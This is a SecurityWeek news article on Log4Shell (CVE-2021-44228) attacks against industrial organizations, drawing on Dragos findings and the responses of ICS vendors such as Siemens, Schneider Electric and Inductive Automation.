Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

ICS/OT

Industrial Organizations Targeted in Log4Shell Attacks

Log4Shell attacks target industrial companies

Industrial organizations are exposed to attacks leveraging a recently disclosed — and already exploited — vulnerability affecting the widely used Log4j logging utility.

Log4Shell attacks target industrial companies

Industrial organizations are exposed to attacks leveraging a recently disclosed — and already exploited — vulnerability affecting the widely used Log4j logging utility.

Industrial cybersecurity firm Dragos reported on Monday that it has observed both attempted and successful exploitation of the vulnerability, and the company says it has already coordinated the takedown of a malicious domain used in attacks.

The critical vulnerability, tracked as CVE-2021-44228 and dubbed Log4Shell and LogJam, came to light in late November, and it was patched on December 6. Evidence suggests that exploitation of the vulnerability may have started on December 1, but mass exploitation began on around December 9, after weaponized proof-of-concept (PoC) exploits were made available.

Apache Log4j is a Java-based logging tool that is included in various open source libraries, and is directly embedded in many popular software applications.

A security hole affecting the cross-platform library, specifically its Java Naming and Directory Interface (JNDI) lookup feature, can be exploited for remote code execution by getting the targeted system to log a specially crafted string.

Many threat groups have exploited the vulnerability — which can be used to take complete control of a system — to deliver various types of malware.

“This cross-cutting vulnerability, which is both vendor agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, to include electric power, water, food and beverage, manufacturing, transportation, and more,” Dragos said.

“Log4j is found in popular open-source repositories used in numerous industrial applications, such as Object Linking and Embedding for Process Control (OPC) Foundation’s Unified Architecture (UA) Java Legacy. Additionally, adversaries can leverage this vulnerability in proprietary Supervisory Control and Data Acquisition (SCADA) and Energy Management Systems (EMS) which make use of Java in their codebase,” it added.

The company noted that while the Lightweight Directory Access Protocol (LDAP) has been the primary attack vector, it has observed attack attempts leveraging DNS and Remote Method Invocation (RMI).

Dragos pointed out that robust segmentation of the IT/OT networks significantly reduces the risk of impact on industrial systems, but the company warned that threat actors may develop more sophisticated Log4Shell exploits once network defenders address the easier exploit paths.

ICS vendors respond to Log4Shell

Industrial control system (ICS) manufacturers have started responding to Log4Shell.

As of Monday night, Siemens has confirmed that 17 of its products are affected by CVE-2021-44228 and there are many more that are still being analyzed. The German industrial giant has started releasing patches and it has provided mitigation advice.

Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Schneider Electric has also released an advisory, but it’s still working on determining which of its products are affected. In the meantime, it has shared general mitigations to reduce the risk of attacks.

Inductive Automation, which provides SCADA software and industrial automation solutions, told customers that it has conducted a full audit and determined that its products are not impacted.

“Software vendors in the OT space are in a unique position to help their clients by ideally having tabs on their software, but also within environments they help maintain (e.g. service agreement),” Ron Brash, VP of technical research at aDolus Technology, told SecurityWeek.

“Unfortunately, there are varying levels of component awareness when it comes to vendor supply chain security, and this is particularly problematic for current and past products where accurate component inventories are lacking or source code/build chains are poorly understood,” Brash said.

Related: ICS Vendors Assessing Impact of New OPC UA Vulnerabilities

Related: ICS Vendors Assess Impact of INFRA:HALT Vulnerabilities

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.

Register

Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.

Register

Expert Insights

Related Content

Vulnerabilities

Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

Vulnerabilities

Apple has released updates for macOS, iOS and Safari and they all include a WebKit patch for a zero-day vulnerability tracked as CVE-2023-23529.

Application Security

Drupal released updates that resolve four vulnerabilities in Drupal core and three plugins.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.